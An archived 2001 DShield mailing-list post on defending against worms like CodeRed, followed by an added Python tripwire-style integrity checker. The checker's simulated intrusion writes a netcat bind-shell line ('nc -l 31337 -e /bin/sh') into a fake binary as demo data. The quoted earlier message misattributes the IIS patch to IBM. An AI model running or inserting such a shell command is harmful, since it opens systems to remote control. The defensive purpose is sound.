[Dshield] Who's doing what

Brian P. Donohue zbd at u.washington.edu
Sat Aug 11 10:31:27 GMT 2001


 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Short-term, there are lots of things that could be done to reduce all
the so-called hacking that's getting big press these days.
Long-term, IP was not originally designed with any thought for
security.  Security needs to be built into protocols at the packet
level.  That's being worked on now, by committee, so I'm going to go
out on a limb & predict that processes related to securing
IP-connected devices will continue to be a source of gainful
employment for many of us for some time to come.

I contend that hackers can't be stopped completely.  However, really
good hackers are relatively rare.  Some simple steps can keep out
those who don't really know what they're doing, and make all of them
work much harder to do what they do.

There are some things that could be done by ISPs.  They don't need to
try to solve all our problems at once, but they might reduce the
signal-to-noise ratio enough to allow us to get more work done.  For
example, they could simply allow all traffic, but subject it to
stateful packet inspection, rejecting malformed headers.  That would
have stopped CodeRed and a number of other buffer overflow exploits
cold.  

I'm not going to hold my breath waiting for this to happen.

There are some things that could be done by OS vendors.  In
particular, they could start using tools long available to avoid
creating software that runs with vulnerable unchecked buffers. 
Microsoft is not the only miscreant here - Sun, other Unix variants,
and Linux all require frequent patching as well.

Again, I'm not going to hold my breath waiting for this to happen.

Filtering packets at the host seems like a good place to start.  IP
wrappers on Unix/Linux, and third-party software on Windows, or IPSec
for those who are in a position to use it.  For home users, there are
also hardware solutions from a variety of vendors - a poor man's
firewall, costing between $75 and $250.  Why allow your system to
communicate with other computers without approving it (by configuring
packet filters)?  Most packet-filtering software slows down port
scanning, frustrating the hacker, and raising the bar on skill needed
to defeat those defenses.  It also requires the hacker to have the
skill to defeat the packet filters.

Encrypting traffic between the systems that you do allow to talk to
each other makes it harder for the hacker that backdoors a system
near you & installs a packet sniffer.  This is a weak area in terms
of software development right now.  ssh keeps getting hacked, and
encrypting traffic between Windows systems is not a task for novices.

Using tools that tell you when system files change, like tripwire,
can alert you to an intrusion when some jerk does slip by other
defenses.

Monitoring logs helps, too, if you turn them on.

There's also a lot of software out there that can be used to analyze
systems for vulnerabilities.  Most of it will tell you how to fix the
problems.

Securing file systems properly prevents the more trivial intrusions. 
Securing shared network resources is another little step along the
path.

In Windows NT/2000, setting up system policies to be as restrictive
as possible while still allowing you to provide services and do work
will further waste the time of the hacker trying to compromise your
system.

I really could carry on for a while, but I'd rather not.  Most of the
readers herein know that there are many other things I didn't
mention.  The point of this rambling dissertation is, hackers have
cost many of us a great deal of time and sleepless nights for no
particular reason.  We should try to return the favor & waste some of
their time.

Sadly, computing security can't really be automated.  There still
needs to be someone around a computer with a solid understanding of
what it does and why in order to successfully secure it.  I work in
an educational environment where those who buy computers often don't
budget for their administration.  There are probably millions of
clueless home users out there getting access to enough bandwidth to
make their systems good hacker tools.  These kind of problems won't
be solved soon, so all we can do as sysadmins is cover our own little
patches of turf as best we can.

My big nightmare is not the author of CodeRed, or the SirCam virus,
or the IISadmin web defacement exploit.  These are recreational
terrorists whose exploits, while receiving plenty of press, are in
the end just an inconvenience (albeit sometimes costly).  My worry is
that pretty good programmer out there who is interested in
unauthorized access to my systems for profit.  That hacker will be
well-motivated to pass unnoticed through my systems, finding ways to
turn his skills into cash.  I want to focus on catching the
night-crawlers, not on chasing after an ethernet fireworks show.

- -----Original Message-----
From: dshield-admin at dshield.org [mailto:dshield-admin at dshield.org]On
Behalf Of Samuel
Sent: Friday, August 10, 2001 2:28 PM
To: Dshield at Dshield. Org
Subject: [Dshield] Who's doing what


Has anyone determined what other organizations are taking action
against the worms, and what those actions are? There is a lot of
discussion within this mailing list of what to do but I think it
would be better to work with as many other organizations as possible
and to include them and be included with them in discussions of what
to do. I agree that it would be better to develop more long-term
solutions whenever possible.

I think that with more long-term solutions developed in cooperation
with other organizations, especially standards and enforcement
organizations, if cooperation from internet users is needed, then the
media could be used very effectively. If the potential damage could
be explained dramatically and if actual solutions could be provided
clearly, then they will likely bombard everyone with the information
enough to satisfy everyone in this group at least.

I am not talking about the problem of IIS systems being vulnerable,
in which the solution is to apply the patch from IBM. The problem I
am talking about is the problem of administrators that do not apply
the patch and the systems that have been infected as a result. Sample
short-term solutions are (1) using the worm against itself to apply
the patch (2) members of this group emailing the administrators
notification of the problem. Sample long-term solutions would be (1)
revise the standards to require that domain name information include
a mechanism for this type of thing (2) establish an organization
officially responsible for notifying system administrators of a
problem affecting the internet in general (3) establish an official
procedure responsible for notification of system administrators of a
problem affecting the internet in general.


_______________________________________________
Dshield mailing list
Dshield at dshield.org
To change your subscription options (or unsubscribe), see:
http://www1.dshield.org/mailman/listinfo/dshield

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

iQA/AwUBO3UJeEZz540guc7SEQKLTwCdGzalrjmRJ8/yB9YfCSfaPtv437QAni8j
seM6btQHhm1qJ4qoDYwO28fv
=SN0a
-----END PGP SIGNATURE-----
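Brian's point about tools like tripwire that "tell you when system files change" is easy to see in working code. The block below is an added example written for this archive page; it is neither Brian's code nor Tripwire's. It builds a constructed directory tree in a temp dir (the paths, file contents and the "intrusion" are all made up for the demo), takes a baseline of content hash, permission bits and size for every regular file and symlink, tampers with the tree the way a backdoor install would, and reports what moved.

```python
"""Tripwire-style file integrity check: baseline a tree, then diff it.

Added example, not code from the original post or from Tripwire.
It assumes a plain directory tree on local disk; demo() builds a
constructed one in a temporary directory so the script runs offline.
"""
import hashlib
import os
import stat
import tempfile
from pathlib import Path


def hash_file(path: Path, chunk: int = 65536) -> str:
    """SHA-256 of a file's contents, read in chunks so big files are fine."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def baseline(root: Path) -> dict:
    """Map each regular file or symlink (path relative to root) to
    (digest, permission bits, size). Directories, sockets, devices are
    skipped. Symlinks are recorded by their target so a swapped link
    shows up as 'modified' rather than being silently followed."""
    snapshot = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            st = p.lstat()  # lstat: do not follow the link
            if stat.S_ISLNK(st.st_mode):
                digest = "symlink:" + os.readlink(p)
            elif stat.S_ISREG(st.st_mode):
                digest = hash_file(p)
            else:
                continue
            rel = p.relative_to(root).as_posix()
            snapshot[rel] = (digest, stat.S_IMODE(st.st_mode), st.st_size)
    return snapshot


def compare(old: dict, new: dict) -> dict:
    """Report added, removed and modified paths between two snapshots.
    Any change in content, permission bits or size counts as modified."""
    added = sorted(set(new) - set(old))
    removed = sorted(set(old) - set(new))
    modified = sorted(p for p in set(old) & set(new) if old[p] != new[p])
    return {"added": added, "removed": removed, "modified": modified}


def demo() -> dict:
    """Constructed scenario: baseline a tiny fake root, then simulate a
    trojaned binary, a dropped file, loosened permissions and a deletion."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        (root / "etc").mkdir()
        (root / "bin" / "ls").write_bytes(b'#!/bin/sh\nexec /usr/bin/ls "$@"\n')
        (root / "etc" / "passwd").write_text("root:x:0:0:root:/root:/bin/sh\n")
        (root / "etc" / "shadow").write_text("root:*:0:0:99999:7:::\n")
        os.chmod(root / "etc" / "shadow", 0o600)
        before = baseline(root)

        # Simulated intrusion (constructed, not a real sample):
        (root / "bin" / "ls").write_bytes(
            b'#!/bin/sh\nnc -l 31337 -e /bin/sh &\nexec /usr/bin/ls "$@"\n'
        )                                               # trojaned binary
        (root / "bin" / "rootkit").write_bytes(b"\x7fELF")  # dropped file
        os.chmod(root / "etc" / "shadow", 0o644)        # perms loosened
        (root / "etc" / "passwd").unlink()              # file removed
        after = baseline(root)
        return compare(before, after)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind:9s} {paths}")
```

Two caveats a practitioner would add. The baseline is only as trustworthy as where it is stored: keep it (and the checker) on read-only or off-host media, because the same intruder who replaced /bin/ls will happily rewrite a baseline left on the compromised disk. And the checker reads through the kernel, so a kernel-level rootkit can feed it the original file contents; for that case the check has to be run from a trusted boot.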



